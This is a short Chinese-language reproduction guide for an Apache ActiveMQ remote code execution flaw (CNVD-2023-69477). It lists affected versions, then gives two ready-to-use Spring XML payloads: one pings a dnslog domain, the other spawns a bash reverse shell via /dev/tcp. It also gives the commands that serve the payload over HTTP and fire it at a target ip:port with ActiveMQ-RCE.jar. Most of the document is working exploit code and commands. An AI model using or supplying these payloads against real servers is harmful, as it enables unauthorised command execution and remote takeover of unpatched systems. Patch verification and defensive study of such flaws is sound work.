Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)
1、漏洞版本
Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16
2、POC
通过dnslog验证的poc.xml
<?xml version="1.0" encoding="utf-8"?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>ping</value> <value>ne5q0v.dnslog.cn</value> </list> </constructor-arg> </bean>
</beans>
反弹shell的poc.xml
<?xml version="1.0" encoding="UTF-8" ?><beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg ><list><value>bash</value><value>-c</value><value><![CDATA[bash -i >& /dev/tcp/ip/端口 0>&1]]></value></list></constructor-arg></bean></beans>
3、复现过程
1、在本地含有poc.xml的文件夹下开启http服务
python -m http.server #默认端口为8000
可以正常访问即为开启成功
2、通过ActiveMQ-RCE.jar工具进行漏洞验证
java -jar ActiveMQ-RCE.jar tcp://目标ip:目标端口 http://开启http服务的ip:8000/poc.xml
3、命令执行成功,且在dnslog 平台收到dns请求记录
4、工具地址
ActiveMQ-RCE.jar
结束语:来自某吧的诗句
很多人看不到未来,其实是看到了未来
咖啡因来自咖啡果
苦难是生命的防沉迷系统